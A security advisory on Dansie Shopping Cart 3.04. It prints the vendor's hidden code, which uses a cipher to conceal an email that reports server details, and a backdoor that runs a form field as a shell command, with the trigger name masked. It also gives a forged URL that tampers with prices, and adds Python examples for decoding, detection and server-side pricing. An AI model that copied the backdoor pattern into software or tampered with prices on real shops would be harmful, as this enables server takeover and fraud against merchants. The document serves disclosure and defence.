COMMAND

    Dansie Shopping Cart

SYSTEMS AFFECTED

    Dansie Shopping Cart 3.04

PROBLEM

    One of our clients, while installing and configuring the Dansie
    Shopping Cart, ran into difficulty integrating PGP, the shopping
    cart program, and our secure server setup.  While trying to assist
    our client with the cart and PGP configuration we discovered a
    couple of things.  This was found by joe@blarg.net.

    The CGI, under  certain conditions, sends  an email to  the author
    of the Dansie shopping cart software, 'tech@dansie.net'.  This  is
    not readily  apparent as  the code  that handles  this transaction
    incorporates a  simple Caesar  Cipher to  hide the  email address.
    The cipher is handled via the subroutine 'there2':

        sub there2
        {
            $_ = "$_[0]";
            tr/a-z0-9/gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth/;
            tr/_/-/;
            tr/\@/\./;
            return $_;
        }

    The call that creates this email address and sends the mail is the
    function 'there3'.

        sub there3
        {
            if (($ENV{'OS'} !~ /Windows_NT/i) && ($mailprog) && (-e "$mailprog"))
            {
                $a = &there2('8v59')."\@".&there2('kte3cv').".".&there2('ev8');
                $b = &there2('8v59_3jhhzi8');
                pop(@there2);
                pop(@there2);
                $c = &there2("@there2");
                open (TECH, "|$mailprog $a");
                print TECH "To: $a\n";
                print TECH "From: $a\n";
                print TECH "Subject: $b\n\n";
                print TECH "$path3\n";
                print TECH "$ENV{'HTTP_HOST'} $ENV{'SERVER_NAME'}\n";
                print TECH "$c\n";
                print TECH "$e $there\n" if ($e);
                close (TECH);
            }
        }

    The ciphered strings, when passed through 'there2', result in:

           8v59          == tech
           kte3cv        == dansie
           ev8           == net
           8v59_3jhhzi8  == tech-support
           $a            == tech@dansie.net
           $b            == tech-support  (used as the Subject: header)
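    The table above can be checked offline.  The following is an added
    example, not code from the advisory or from the cart itself: a Python
    re-implementation of the 'there2' tr/// table, the address assembly
    done by 'there3', and the inverse map (so one can see which ciphertext
    yields a given plaintext such as 'dansie').

```python
# Added example (not the advisory's or the cart's code): re-implementation of
# the cart's 'there2' substitution so obscured strings can be decoded offline.
import string

# Exact ranges from the Perl statement tr/a-z0-9/gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth/
PLAIN = string.ascii_lowercase + string.digits            # 36 characters
CIPHER = "gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth"           # 36 characters, a permutation

# Perl's tr maps each character of the first list to the character at the same
# position in the second.  The cart's next two tr calls map '_' -> '-' and
# '@' -> '.'; folding them into one table is safe because the first table never
# emits '_' or '@'.
FORWARD = str.maketrans(PLAIN + "_@", CIPHER + "-.")
INVERSE = str.maketrans(CIPHER, PLAIN)   # CIPHER is a permutation, so this is exact

def there2(s: str) -> str:
    """Equivalent of the cart's there2 subroutine: ciphertext -> plaintext."""
    return s.translate(FORWARD)

def encode_for_there2(s: str) -> str:
    """Inverse of there2 for the a-z0-9 table: which ciphertext decodes to s."""
    return s.translate(INVERSE)

def tech_address() -> str:
    """Rebuild $a exactly as there3 does: three decoded pieces joined by '@' and '.'."""
    return there2("8v59") + "@" + there2("kte3cv") + "." + there2("ev8")

if __name__ == "__main__":
    for ct in ("8v59", "kte3cv", "ev8", "8v59_3jhhzi8"):
        print(f"{ct:14} -> {there2(ct)}")
    print("$a            ->", tech_address())
    print("'dansie' comes from ->", encode_for_there2("dansie"))
```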

    This seems curious, but plausible reasons could include ensuring
    license compliance, or maybe the cart automatically sends this
    email when an error occurs.  The program definitely goes out of
    its way to hide the fact that the mail is being sent.

    While going  through the  rest of  the code  Joe discovered a much
    more interesting item.

        if ( ( ( $FORM{'?????????'}) && ($ENV{'HTTP_HOST'} !~ /($d)/) ) || ( ($FORM{'?????????'} ) && (!$d) ) )
        {
            if ( $ENV{'OS'} )
            {
                system("$FORM{'?????????'}");
            }
            else
            {
                open(ELIF,"|$FORM{'?????????'}");
            }
            exit;
        }

    The form element '?????????', which was originally a pseudo-random
    looking nine-character string of letters and digits, allows an
    intruder to execute any command on the server with the same
    privileges as the CGI process itself.  Although this is a full
    disclosure list, the trigger element is obscured to prevent the
    script kiddies from running away with this back door.  If you own
    the cart, then you have access to the source code and can
    discover the element in question easily enough on your own.

    Further searches through  the code reveal  that this form  element
    is  immune  to  data  validation  -  it gets passed into this code
    fragment unchallenged.

    The '$d' variable in the condition which permits the back door to
    function is set elsewhere in the program (again using the cipher
    routine) to contain the string 'dansie'.  This indicates that the
    form element won't work on Dansie's own host, but will work on
    anyone else's.  There are additional problems with the 'there'
    function but we'll leave them as exercises for the reader to
    decipher.
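    Anyone auditing a cart like this for the same construct can grep for
    it mechanically.  The following is an added example, not part of the
    advisory or the cart: a small Python audit script that flags Perl
    shell-outs whose argument interpolates a form variable, i.e. the
    system("$FORM{...}") and open(FH, "|$FORM{...}") pattern quoted above.
    The sample source it scans is constructed from the fragment in this
    advisory; the two regexes are deliberately minimal.

```python
# Added example (not the advisory's or the cart's code): flag Perl CGI lines
# where request data ($FORM{...}) is interpolated straight into a shell command.
import re

# Constructed sample: the back-door fragment quoted in the advisory plus one
# harmless use of $FORM for contrast.
SAMPLE_SOURCE = r"""if ( ( ( $FORM{'?????????'}) && ($ENV{'HTTP_HOST'} !~ /($d)/) ) || ( ($FORM{'?????????'} ) && (!$d) ) )
{
    if ( $ENV{'OS'} )
    {
        system("$FORM{'?????????'}");
    }
    else
    {
        open(ELIF,"|$FORM{'?????????'}");
    }
    exit;
}
print "Total: $FORM{'price'}\n";
"""

# system(...) / exec(...) with a double-quoted argument that interpolates $FORM{...}.
SHELL_CALL = re.compile(r'\b(system|exec)\s*\(\s*"[^"]*\$FORM\{')
# open(HANDLE, "|...") : a pipe-open whose command string interpolates $FORM{...}.
PIPE_OPEN = re.compile(r'\bopen\s*\([^,]+,\s*"\|[^"]*\$FORM\{')

def find_form_shellouts(source: str) -> list[tuple[int, str, str]]:
    """Return (line number, kind, stripped line) for every suspicious line.

    Sanitising the value is not the fix for what this finds: request data should
    never select the command at all, so each hit is a code path to remove.
    """
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        if SHELL_CALL.search(line):
            hits.append((lineno, "system/exec", line.strip()))
        elif PIPE_OPEN.search(line):
            hits.append((lineno, "pipe-open", line.strip()))
    return hits

if __name__ == "__main__":
    for lineno, kind, text in find_form_shellouts(SAMPLE_SOURCE):
        print(f"line {lineno:3} [{kind}] {text}")
```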

    Dansie.net,  armed  with  the  server  name  and  URL  to  the CGI
    executable provided by  the cloaked email  routine, would be  able
    to run commands  on any web  server on the  Internet that has  the
    Dansie Shopping  Cart installed.  It takes  little imagination  to
    dream up the potential havoc and privacy violations this level  of
    access could result in; from stealing private customer records  to
    a full-blown crack of an E-Commerce server.

    Kasey also discovered  the back door  and cloaked email  routines.
    Kasey also  provides evidence  in the  post to  indicate that  not
    only is Dansie  well aware of  the back door  routine, but may  be
    actively  attempting  to  utilize   it.   Based  upon  Joe's   own
    investigation, the information Kasey posted, and our own  firewall
    logs (see  below), it  is our  opinion that  the back  door within
    Dansie.net's shopping cart can best be summarized as follows:

        1. The back door is very deliberate.
        2. It isn't unique to the one copy we have access to here.
        3. *Is being actively utilized by the author of the CGI.

    * Based  upon the  log snippet  in Kasey's  post showing attempted
      access to the  CGI from an  Earthlink dial-up IP.   According to
      Kasey, access  to the  CGI was  attempted less  than 30  minutes
      after the cart was installed.

    When we noticed the attempted usage of Kasey's server, a quick
    check of our own firewall logs revealed the following:

        Packet log: input REJECT eth0 PROTO=6 209.179.141.xx:1054 x.x.x.x:80
        {repeated several dozen times}

    We  can  only  assume  these  attempts,  made from the same /24 on
    Earthlink's  dial-ups  as  the  one  used to probe Kasey's server,
    were from the author of the shopping cart.

    If installing a back door in the cart software wasn't bad enough,
    the whole implementation of pricing and adding items to the cart
    is crap.  Example form to add items to your cart (kindly provided
    on the publisher's site using the demo cart they set up for us):

        *snip*

        <FORM METHOD=POST ACTION="http://www.dansie.net/cgi-bin/scripts/cart.pl">

        Black Leather purse with leather straps<BR>
        Price: $20.00<BR>

        <INPUT TYPE=HIDDEN NAME=name     VALUE="Black leather purse">
        <INPUT TYPE=HIDDEN NAME=price    VALUE="20.00">
        <INPUT TYPE=HIDDEN NAME=sh       VALUE="1">  <!-- Shipping and Handling -->
        <INPUT TYPE=HIDDEN NAME=img      VALUE="purse.jpg">
        <INPUT TYPE=HIDDEN NAME=return   VALUE="http://www.dansie.net/demo.html">
        <INPUT TYPE=HIDDEN NAME=custom1  VALUE="Black leather purse with leather straps">

        <INPUT TYPE=SUBMIT NAME="add" VALUE="Put in Shopping Cart">
        </FORM>

        *snip*

    A couple of quick alterations and we can now add:

        http://www.dansie.net/cgi-bin/scripts/cart.pl?name=piece+of+crap+cart+software&price=1.00&sh=1&img=purse.jpg&return=http://www.dansie.net/demo.html&custom1=my+shopping+cart+software+sucks+because+i+let+users+manipulate+crucial+variables
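    The fix for this class of problem is for the server to treat the hidden
    'price' field as a display hint only and to price the item from its own
    data.  The following is an added example, not the cart's code: a Python
    add-to-cart handler that parses a cart.pl style query string, prices the
    item from a constructed server-side catalogue, and records whether the
    submitted price disagreed with it.

```python
# Added example (not the cart's code): an add-to-cart handler that never lets
# the browser-supplied 'price' field decide what is charged.
from dataclasses import dataclass
from decimal import Decimal, InvalidOperation
from urllib.parse import parse_qs

# Constructed catalogue keyed by item name.  In a real deployment this lives
# in the merchant's product data, not in hidden form fields the client can edit.
CATALOG = {
    "Black leather purse": Decimal("20.00"),
}

@dataclass
class LineItem:
    name: str
    price: Decimal    # always the catalogue price
    tampered: bool    # True when the submitted price disagreed with the catalogue

def add_to_cart(query_string: str) -> LineItem:
    """Parse a cart.pl-style query string and build a line item from trusted data.

    'img', 'return' and 'custom1' are accepted only as opaque display hints;
    nothing that affects money is taken from the client.
    """
    form = {k: v[0] for k, v in parse_qs(query_string).items()}
    name = form.get("name", "")
    if name not in CATALOG:
        # Unknown items are refused rather than added at whatever price was sent.
        raise ValueError(f"unknown item: {name!r}")
    real_price = CATALOG[name]
    try:
        submitted = Decimal(form.get("price", ""))
    except InvalidOperation:
        submitted = None          # missing or malformed price also counts as tampering
    # The mismatch is recorded so the merchant can alert on manipulation attempts.
    tampered = submitted != real_price
    return LineItem(name=name, price=real_price, tampered=tampered)

if __name__ == "__main__":
    # A request in the shape of the advisory's forged URL, with the demo item's
    # price lowered to 1.00: the line item is still priced at 20.00.
    print(add_to_cart("name=Black+leather+purse&price=1.00&sh=1&img=purse.jpg"))
```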

SOLUTION

    The Dansie Shopping Cart bug has been removed; it should no longer
    email him anti-piracy information or allow any surreptitious
    access.  Craig is shipping the patch in his next update to all his
    customers; due to the nature of his script, all customers need to
    update on a regular basis to remain functional.